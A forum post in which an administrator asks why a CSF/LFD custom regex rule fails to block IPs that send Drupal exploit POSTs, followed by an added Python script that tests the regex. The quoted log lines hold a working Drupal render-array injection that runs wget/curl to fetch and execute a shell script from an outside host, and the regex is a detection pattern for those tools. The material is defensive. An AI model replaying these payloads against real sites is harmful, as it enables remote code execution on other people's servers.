regex.custom.pm to block Drupal vulnerability POSTs
Posted: 24 Oct 2018, 11:55
Hello,
I've been using CSF & LFD for years and it's done very well for me. However I'm attempting something I haven't done before and am having trouble getting it to work. I am trying to block IP addresses that are attempting to POST command lines (nohup, wget etc) into perceived Drupal vulnerabilities. The vulnerabilities are long gone but these attempts are generating significant traffic.
This is an example of the offending log line:
Code:
92.63.103.241 - - [24/Oct/2018:11:49:31 +0200] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23markup]=kill%20-9%20-1;%20nohup%20wget%20-O%20-%20http://164.132.159.56/drupal/ups.sh%7Csh%20&;%20nohup%20curl%20%20http://164.132.159.56/drupal/ups.jpg%7Csh%20&&name[%23type]=markup HTTP/1.1" 200 30
So, I want to block IP addresses from apache logs that match the following regexp (just attempting nohup for now):
Code:
^(\d+\.\d+\.\d+\.\d+) \- \-.*POST .*nohup.*
I updated the CUSTOM1 logline in csf.conf to look like this:
Code:
CUSTOM1_LOG = "/var/log/httpd/flashbase*"
And added the following to regex.custom.pm:
Code:
# Match the client IP of any POST whose request line contains "nohup"
if (($globlogs{CUSTOM1_LOG}{$lgfile}) and ($line =~ /^(\d+\.\d+\.\d+\.\d+) \- \-.*POST .*nohup.*/)) {
return ("drupal nohup POST attack from",$1,"drupal_nohup","5","80,443","10");
}
When I restart csf & lfd I get the following lines in lfd.log:
Code:
Oct 24 12:32:12 xxxx lfd[1408]: Watching /var/log/httpd/flashbase_access_log...
Oct 24 12:32:12 xxxx lfd[1408]: Watching /var/log/httpd/flashbase_error_log...
However this has absolutely no effect (I attempted a POST myself, plus a whole bunch of malicious ones occurred after csf & lfd were restarted).
Suspecting it might be an issue with the regexp, I made it as simple as possible, blocking any entry in the logfile containing what looks like an IP address:
Code:
# Match any line that contains something shaped like an IPv4 address
if (($globlogs{CUSTOM1_LOG}{$lgfile}) and ($line =~ /.*(\d+\.\d+\.\d+\.\d+).*/)) {
return ("drupal nohup POST attack from",$1,"drupal_nohup","5","80,443","10");
}
Still no joy, try as I might I just cannot get csf/lfd to block me on this rule (I can access the server from a different IP so it's fine if it blocks the one I was testing from).
Are there configuration steps that are required to enable custom.regex.pm? Am I missing something here?
Any help gratefully appreciated
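A way to dry-run the rule above against real log lines before handing it to lfd, added here as an example and not part of the original post or of csf. It applies the same pattern in Python (the `re` module and Perl agree on this syntax), widened from `nohup` alone to the other commands the post mentions, and counts matches per IP, which is what lfd compares against the trigger value in the rule's return list (5 in the post). The sample lines other than the one quoted in the post are constructed, and `hits_per_ip` / `offending_ip` are names chosen for this example.

```python
import re

# The post's rule as a Python regex; Python's re and Perl treat this syntax
# the same, so a line matching here matches in regex.custom.pm as well.
# The alternation widens "nohup" to the other commands the post mentions.
POST_CMD_RE = re.compile(r'^(\d+\.\d+\.\d+\.\d+) \- \-.*POST .*(?:nohup|wget|curl)')

def offending_ip(line):
    """Return the client IP when the Apache access log line matches, else None."""
    m = POST_CMD_RE.match(line)
    return m.group(1) if m else None

def hits_per_ip(lines):
    """Count matching lines per IP; lfd compares this count with the rule's
    trigger value (5 in the post) within LF_INTERVAL before blocking."""
    counts = {}
    for line in lines:
        ip = offending_ip(line)
        if ip is not None:
            counts[ip] = counts.get(ip, 0) + 1
    return counts

# Constructed test input: the post's log line plus made-up neighbours
# (203.0.113.0/24 and 198.51.100.0/24 are documentation address ranges).
SAMPLE_LOG = [
    '92.63.103.241 - - [24/Oct/2018:11:49:31 +0200] "POST //?q=user/password'
    '&name[%23post_render][]=passthru&name[%23markup]=kill%20-9%20-1;%20nohup'
    '%20wget%20-O%20-%20http://164.132.159.56/drupal/ups.sh%7Csh%20&;%20nohup'
    '%20curl%20%20http://164.132.159.56/drupal/ups.jpg%7Csh%20&&name[%23type]'
    '=markup HTTP/1.1" 200 30',
    '203.0.113.5 - - [24/Oct/2018:11:50:02 +0200] "GET /index.php HTTP/1.1" 200 5120',
    '203.0.113.5 - - [24/Oct/2018:11:50:09 +0200] "POST /user/login HTTP/1.1" 302 0',
    '92.63.103.241 - - [24/Oct/2018:11:51:40 +0200] "POST //?q=user/password'
    '&name[%23markup]=curl%20http://198.51.100.7/x.sh%7Csh HTTP/1.1" 200 30',
    # A harmless POST whose path merely contains "wget": the pattern is a plain
    # substring test, so this matches too. Tighten the regex if that matters.
    '203.0.113.9 - - [24/Oct/2018:11:52:00 +0200] "POST /blog/wget-tips HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for ip, n in hits_per_ip(SAMPLE_LOG).items():
        print(f"{ip}: {n} matching line(s)")
```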